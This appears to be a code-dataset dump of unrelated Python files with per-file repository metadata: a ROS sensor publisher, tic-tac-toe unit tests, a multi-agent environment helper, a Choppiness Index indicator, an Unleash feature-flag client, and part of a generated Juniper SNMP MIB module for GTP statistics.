pub = rospy.Publisher('sensor', Int32MultiArray, queue_size=10)
rospy.init_node('sensor_node', anonymous=True)
rate = rospy.Rate(100)
while not rospy.is_shutdown():
sensor.update()
data_to_send = Int32MultiArray()
data_to_send.data = np.asarray([sensor.ax[0],sensor.ay[0],sensor.az[0]])
pub.publish(data_to_send)
rate.sleep()
if __name__ == '__main__':
main()
| 25.431034 | 80 | 0.553559 | 2,174 | 0.736949 | 0 | 0 | 0 | 0 | 0 | 0 | 304 | 0.103051 |
5e29eba4a3cf0f4a96a10f81ab236f70af7ead6e | 2,847 | py | Python | tests/test_play_turn.py | Avashist1998/tictactoe-abhay | e2a023234b4c903879d2d819997a579eb9e649d0 | [
"MIT"
] | null | null | null | tests/test_play_turn.py | Avashist1998/tictactoe-abhay | e2a023234b4c903879d2d819997a579eb9e649d0 | [
"MIT"
] | null | null | null | tests/test_play_turn.py | Avashist1998/tictactoe-abhay | e2a023234b4c903879d2d819997a579eb9e649d0 | [
"MIT"
] | null | null | null | import unittest
from tic_tac_toe.TicTacToe import TicTacToe
def board_starter(spot:int):
game = TicTacToe()
status = game.play_turn(spot)
return game, status
class test_play_turn(unittest.TestCase):
def test_perfect_case(self):
game, status = board_starter(1)
board = '|x|2|3|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(2)
board = '|1|x|3|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(3)
board = '|1|2|x|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(4)
board = '|1|2|3|\n-------\n|x|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(5)
board = '|1|2|3|\n-------\n|4|x|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(6)
board = '|1|2|3|\n-------\n|4|5|x|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(7)
board = '|1|2|3|\n-------\n|4|5|6|\n-------\n|x|8|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(8)
board = '|1|2|3|\n-------\n|4|5|6|\n-------\n|7|x|9|\n'
self.assertEqual(game.get_board(), board)
game, status = board_starter(9)
board = '|1|2|3|\n-------\n|4|5|6|\n-------\n|7|8|x|\n'
self.assertEqual(game.get_board(), board)
def test_over_lap_case(self):
game, status = board_starter(1)
board = '|x|2|3|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
status = game.play_turn(1)
self.assertEqual(-1, status)
self.assertEqual(board, game.get_board())
game, status = board_starter(2)
board = '|1|x|3|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
status = game.play_turn(2)
self.assertEqual(-1, status)
self.assertEqual(board, game.get_board())
game, status = board_starter(3)
board = '|1|2|x|\n-------\n|4|5|6|\n-------\n|7|8|9|\n'
self.assertEqual(game.get_board(), board)
status = game.play_turn(3)
self.assertEqual(-1, status)
self.assertEqual(board, game.get_board())
def test_invalid_case(self):
game = TicTacToe()
status = game.play_turn(-1)
self.assertEqual(-1,status)
game = TicTacToe()
status = game.play_turn()
self.assertEqual(-1,status)
status = game.play_turn(0)
self.assertEqual(-1,status)
if __name__ == "__main__":
unittest.main() | 40.671429 | 63 | 0.545838 | 2,627 | 0.922726 | 0 | 0 | 0 | 0 | 0 | 0 | 574 | 0.201616 |
5e2a1a3b81768dc01ada5c03b830c68d66cb3bb2 | 863 | py | Python | p3_collab-compet/envs.py | albimc/deep-reinforcement-learning | e11a6c9d4c8991cf229e686b645ae22ec4cff4f5 | [
"MIT"
] | null | null | null | p3_collab-compet/envs.py | albimc/deep-reinforcement-learning | e11a6c9d4c8991cf229e686b645ae22ec4cff4f5 | [
"MIT"
] | null | null | null | p3_collab-compet/envs.py | albimc/deep-reinforcement-learning | e11a6c9d4c8991cf229e686b645ae22ec4cff4f5 | [
"MIT"
] | null | null | null | from env_wrapper import SubprocVecEnv, DummyVecEnv
import numpy as np
import multiagent.scenarios as scenarios
from multiagent.environment import MultiAgentEnv
def make_parallel_env(n_rollout_threads, seed=1):
def get_env_fn(rank):
def init_env():
env = make_env("simple_adversary")
env.seed(seed + rank * 1000)
np.random.seed(seed + rank * 1000)
return env
return init_env
# if n_rollout_threads == 1:
# return DummyVecEnv([get_env_fn(0)])
# else:
return SubprocVecEnv([get_env_fn(i) for i in range(n_rollout_threads)])
def make_env(scenario_name, benchmark=False):
scenario = scenarios.load(scenario_name + ".py").Scenario()
world = scenario.make_world()
env = MultiAgentEnv(world, scenario.reset_world, scenario.reward, scenario.observation)
return env
| 30.821429 | 91 | 0.695249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 108 | 0.125145 |
5e2b2f0e5c9cdd14dd3e3052e5392fdfa1eb0061 | 1,115 | py | Python | talipp/indicators/CHOP.py | solocarrie/talipp | a35bbc33444c56683d4e26439f4878e92b937d7f | [
"MIT"
] | 54 | 2020-11-19T02:27:04.000Z | 2022-02-22T06:31:05.000Z | talipp/indicators/CHOP.py | justin-pierce/talipp | f5296381e3f4270b7743694e2ab5a0da301bdaf3 | [
"MIT"
] | 24 | 2020-11-01T17:56:28.000Z | 2021-09-15T18:40:04.000Z | talipp/indicators/CHOP.py | justin-pierce/talipp | f5296381e3f4270b7743694e2ab5a0da301bdaf3 | [
"MIT"
] | 14 | 2020-12-10T22:43:37.000Z | 2022-01-15T22:23:42.000Z | from math import log10
from typing import List, Any
from talipp.indicators.Indicator import Indicator
from talipp.indicators.ATR import ATR
from talipp.ohlcv import OHLCV
class CHOP(Indicator):
"""
Choppiness Index
Output: a list of OHLCV objects
"""
def __init__(self, period: int, input_values: List[OHLCV] = None):
super().__init__()
self.period = period
self.atr = ATR(1)
self.add_sub_indicator(self.atr)
self.initialize(input_values)
def _calculate_new_value(self) -> Any:
if len(self.atr) < self.period or len(self.input_values) < self.period:
return None
max_high = max(self.input_values[-self.period:], key = lambda x: x.high).high
min_low = min(self.input_values[-self.period:], key = lambda x: x.low).low
if max_high != min_low:
return 100.0 * log10(sum(self.atr[-self.period:]) / (max_high - min_low) ) / log10(self.period)
else:
if len(self.output_values) > 0:
return self.output_values[-1]
else:
return None | 28.589744 | 107 | 0.622422 | 941 | 0.843946 | 0 | 0 | 0 | 0 | 0 | 0 | 69 | 0.061883 |
5e2b522b922e568a38309ed95a9002c2eb99209a | 2,177 | py | Python | unleash_client/clients.py | rarruda/unleash-client-python | 2f64bb2eab92eb9b99b4bef54c206d7672c6380c | [
"Apache-2.0"
] | 2 | 2018-10-23T10:07:50.000Z | 2018-10-30T02:37:30.000Z | unleash_client/clients.py | rarruda/unleash-client-python | 2f64bb2eab92eb9b99b4bef54c206d7672c6380c | [
"Apache-2.0"
] | 1 | 2018-09-25T17:29:40.000Z | 2018-09-25T17:29:40.000Z | unleash_client/clients.py | rarruda/unleash-client-python | 2f64bb2eab92eb9b99b4bef54c206d7672c6380c | [
"Apache-2.0"
] | null | null | null | import time
import logging
from urllib.parse import urljoin
from .strategy import DEFAULT_STRATEGIES
from .io import UrlFetcher, Reporter
from .features import Feature
log = logging.getLogger(__name__)
def name_instance():
import os
import socket
return "%s:%s" % (socket.gethostname(), os.getpid())
class Client:
def __init__(
self,
url='http://localhost:4242',
headers=None,
app_name='anon-app',
instance_id=None,
refresh_interval=60,
metrics_interval=60,
disable_metrics=False,
strategies=DEFAULT_STRATEGIES,
clock=time.time,
fetch=None,
):
self.url = url
self._headers = headers
self.app_name = app_name
self.instance_id = instance_id or name_instance()
self.strategies = strategies
features_url = urljoin(url, '/api/client/features')
self.fetch = fetch or UrlFetcher(features_url, refresh_interval, self._headers)
self.defs = {}
self.features = {}
if not disable_metrics:
self.reporter = Reporter(
self,
urljoin(url, '/api/client/metrics'),
metrics_interval,
self._headers,
clock=clock,
)
else:
self.reporter = lambda *al: None
def get(self, name):
d = self.fetch()
if d is not self.defs:
self.defs = d
ts = [Feature(self.strategies, f) for f in d.get('features', [])]
self.features = {t.feature['name']: t for t in ts}
return self.features.get(name, lambda *al, **kw: False)
def enabled(self, name, context = {}):
if not isinstance(context, dict):
log.error("Ignoring context parameter, as it is not a dictionary: %r", context)
context = {}
try:
return self.get(name)(context)
finally:
self.reporter()
def close(self):
self.reporter()
class DummyClient:
enabled = staticmethod(lambda name, context: False)
close = staticmethod(lambda: None)
| 27.556962 | 91 | 0.57051 | 1,854 | 0.851631 | 0 | 0 | 0 | 0 | 0 | 0 | 158 | 0.072577 |
5e2c05aeee32a3c0a0b12b655a2e82559e46b7c9 | 269,482 | py | Python | pysnmp-with-texts/JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/JUNIPER-MOBILE-GATEWAY-SGW-GTP-MIB
# Produced by pysmi-0.3.4 at Wed May 1 14:00:25 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueSizeConstraint, SingleValueConstraint, ValueRangeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueSizeConstraint", "SingleValueConstraint", "ValueRangeConstraint", "ConstraintsUnion")
InetAddressPrefixLength, InetPortNumber, InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddressPrefixLength", "InetPortNumber", "InetAddress", "InetAddressType")
Ipv6AddressIfIdentifier, Ipv6AddressPrefix, Ipv6Address = mibBuilder.importSymbols("IPV6-TC", "Ipv6AddressIfIdentifier", "Ipv6AddressPrefix", "Ipv6Address")
jnxMobileGatewaySgw, = mibBuilder.importSymbols("JUNIPER-MBG-SMI", "jnxMobileGatewaySgw")
EnabledStatus, = mibBuilder.importSymbols("JUNIPER-MIMSTP-MIB", "EnabledStatus")
jnxMbgGwName, jnxMbgGwIndex = mibBuilder.importSymbols("JUNIPER-MOBILE-GATEWAYS", "jnxMbgGwName", "jnxMbgGwIndex")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, Counter64, Bits, TimeTicks, Integer32, iso, ObjectIdentity, MibIdentifier, Unsigned32, Gauge32, IpAddress, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "Counter64", "Bits", "TimeTicks", "Integer32", "iso", "ObjectIdentity", "MibIdentifier", "Unsigned32", "Gauge32", "IpAddress", "NotificationType")
TextualConvention, RowStatus, TruthValue, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "RowStatus", "TruthValue", "DisplayString")
jnxMbgSgwGtpMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2))
jnxMbgSgwGtpMib.setRevisions(('2011-09-21 12:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setRevisionsDescriptions(('Initial version',))
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setLastUpdated('201109211200Z')
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setContactInfo('Juniper Technical Assistance Center Juniper Networks, Inc. 1194 N. Mathilda Avenue Sunnyvale, CA 94089 E-mail: support@juniper.net')
if mibBuilder.loadTexts: jnxMbgSgwGtpMib.setDescription('This module defines some sample objects pertaining to GTP protocol.')
jnxMbgSgwGtpNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 0))
jnxMbgSgwGtpObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1))
jnxMbgSgwGtpCGlbStatsTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2), )
if mibBuilder.loadTexts: jnxMbgSgwGtpCGlbStatsTable.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpCGlbStatsTable.setDescription('Each entry corresponds to a gateway level GTP Control statistic.')
jnxMbgSgwGtpGlbStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1), ).setIndexNames((0, "JUNIPER-MOBILE-GATEWAYS", "jnxMbgGwIndex"))
if mibBuilder.loadTexts: jnxMbgSgwGtpGlbStatsEntry.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGtpGlbStatsEntry.setDescription('A specification of the GTP gateway level control Statistics.')
jnxMbgSgwRxPacketsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwRxPacketsDropped.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwRxPacketsDropped.setDescription('Number of Received Packets Dropped.')
jnxMbgSgwPacketAllocFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPacketAllocFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPacketAllocFail.setDescription('Number of Packet allocation failures.')
jnxMbgSgwPacketSendFail = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPacketSendFail.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPacketSendFail.setDescription('Number of Packet Send failures.')
jnxMbgSgwIPVerErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIPVerErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIPVerErrRx.setDescription('Number of IP Version Error Packets Received.')
jnxMbgSgwIPProtoErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwIPProtoErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwIPProtoErrRx.setDescription('Number of IP protocol Error packets Received.')
jnxMbgSgwGTPPortErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGTPPortErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGTPPortErrRx.setDescription('Number of Port Error Packets Received.')
jnxMbgSgwGTPUnknVerRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwGTPUnknVerRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwGTPUnknVerRx.setDescription('Number of Unknown Version Packets Received.')
jnxMbgSgwPcktLenErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwPcktLenErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwPcktLenErrRx.setDescription('Number of Packet Length Error Packets Received.')
jnxMbgSgwUnknMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 9), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUnknMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUnknMsgRx.setDescription('Number of Unknown Messages Received.')
jnxMbgSgwProtocolErrRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 10), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwProtocolErrRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwProtocolErrRx.setDescription('Number of GTPv2 Protocol Errors Received.')
jnxMbgSgwUnSupportedMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 11), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUnSupportedMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUnSupportedMsgRx.setDescription('Number of GTPv2 Unsupported Messages received.')
jnxMbgSgwT3RespTmrExpRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 12), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwT3RespTmrExpRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwT3RespTmrExpRx.setDescription('Number of GTP V2 T3 timer expiries Received.')
jnxMbgSgwV2NumMsgRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 13), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2NumMsgRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2NumMsgRx.setDescription('Number of GTPv2 messages received.')
jnxMbgSgwV2NumMsgTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 14), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2NumMsgTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2NumMsgTx.setDescription('Number of V2 messages sent.')
jnxMbgSgwV2NumBytesRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 15), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2NumBytesRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2NumBytesRx.setDescription('Number of GTPv2 bytes received.')
jnxMbgSgwV2NumBytesTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 16), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2NumBytesTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2NumBytesTx.setDescription('Number of V2 bytes sent.')
jnxMbgSgwV2EchoReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 19), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2EchoReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2EchoReqRx.setDescription('Number of GTP V2 Echo Request received.')
jnxMbgSgwV2EchoReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 20), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2EchoReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2EchoReqTx.setDescription('Number of GTP V2 Echo Request Sent.')
jnxMbgSgwV2EchoRespRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 21), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2EchoRespRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2EchoRespRx.setDescription('Number of GTP V2 Echo Response received.')
jnxMbgSgwV2EchoRespTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 22), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2EchoRespTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2EchoRespTx.setDescription('Number of GTP V2 Echo Response Sent.')
jnxMbgSgwV2VerNotSupRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 23), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2VerNotSupRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2VerNotSupRx.setDescription('Number of GTP V2 Version Not supported messages received')
jnxMbgSgwV2VerNotSupTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 24), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwV2VerNotSupTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwV2VerNotSupTx.setDescription('Number of GTP V2 version not supported messages sent.')
jnxMbgSgwCreateSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 25), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCreateSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCreateSessReqRx.setDescription('Number of GTP V2 Create Session Requests received.')
jnxMbgSgwCreateSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 26), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCreateSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCreateSessReqTx.setDescription('Number of GTP V2 Create Session Requests Sent.')
jnxMbgSgwCreateSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 27), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCreateSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCreateSessRspRx.setDescription('Number of GTP V2 Create Session Responses received.')
jnxMbgSgwCreateSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 28), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCreateSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCreateSessRspTx.setDescription('Number of GTP V2 Create Session Responses Sent.')
jnxMbgSgwModBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 29), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrReqRx.setDescription('Number of GTP V2 Modify Bearer Requests received.')
jnxMbgSgwModBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 30), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrReqTx.setDescription('Number of GTP V2 Modify Bearer Requests Sent.')
jnxMbgSgwModBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 31), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrRspRx.setDescription('Number of GTP V2 Modify Bearer Responses received.')
jnxMbgSgwModBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 32), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwModBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwModBrRspTx.setDescription('Number of GTP V2 Modify Bearer Responses Sent.')
jnxMbgSgwDelSessReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 33), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelSessReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelSessReqRx.setDescription('Number of GTP V2 Delete Session Requests received.')
jnxMbgSgwDelSessReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 34), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelSessReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelSessReqTx.setDescription('Number of GTP V2 Delete Session Requests Sent.')
jnxMbgSgwDelSessRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 35), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelSessRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelSessRspRx.setDescription('Number of GTP V2 Delete Session Responses received.')
jnxMbgSgwDelSessRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 36), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwDelSessRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwDelSessRspTx.setDescription('Number of GTP V2 Delete Session Responses Sent.')
jnxMbgSgwCrtBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 37), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrtBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrtBrReqRx.setDescription('Number of GTP V2 Create Bearer Requests received.')
jnxMbgSgwCrtBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 38), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrtBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrtBrReqTx.setDescription('Number of GTP V2 Create Bearer Requests Sent.')
jnxMbgSgwCrtBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 39), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrtBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrtBrRspRx.setDescription('Number of GTP V2 Create Bearer Response received.')
jnxMbgSgwCrtBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 40), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwCrtBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwCrtBrRspTx.setDescription('Number of GTP V2 Create Bearer Response Sent.')
jnxMbgSgwUpdBrReqRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 41), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdBrReqRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdBrReqRx.setDescription('Number of GTP V2 Update Bearer Request received.')
jnxMbgSgwUpdBrReqTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 42), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdBrReqTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdBrReqTx.setDescription('Number of GTP V2 Update Bearer Request Sent.')
jnxMbgSgwUpdBrRspRx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 43), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdBrRspRx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdBrRspRx.setDescription('Number of GTP V2 Update Bearer Response received.')
jnxMbgSgwUpdBrRspTx = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 66, 2, 2, 1, 2, 1, 44), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxMbgSgwUpdBrRspTx.setStatus('current')
if mibBuilder.loadTexts: jnxMbgSgwUpdBrRspTx.setDescription('Number of GTP V2 Update Bearer Response Sent.')
